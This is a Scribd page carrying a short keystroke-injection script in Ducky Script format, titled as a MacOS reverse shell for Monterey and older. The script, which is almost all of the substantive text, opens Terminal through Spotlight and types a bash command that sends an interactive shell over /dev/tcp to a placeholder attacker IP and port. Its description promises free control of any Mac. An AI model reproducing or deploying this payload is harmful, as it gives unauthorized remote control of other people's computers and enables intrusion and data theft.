0% found this document useful (0 votes)
37 views1 page

MacOS Reverse Shell Script v1.0

Uploaded by

9yhzmzdt84
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
37 views1 page

MacOS Reverse Shell Script v1.0

Uploaded by

9yhzmzdt84
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

REM Title: MacOSX Reverse Shell (v1.

0)
REM Author: fatherthomas
REM Description: Allows you to traverse through any MacOS system and use bash
commands to do what you please
REM Target: MacOS Monterey (or older versions)
REM Version: 1.0

GUI SPACE
DELAY 100
STRING Terminal
DELAY 200
ENTER
DELAY 900
STRING bash
DELAY 100
ENTER
DELAY 500
STRING bash -i >& /dev/tcp/<attacker ip>/<port> 0>&1
DELAY 200
ENTER
DELAY 1000

You might also like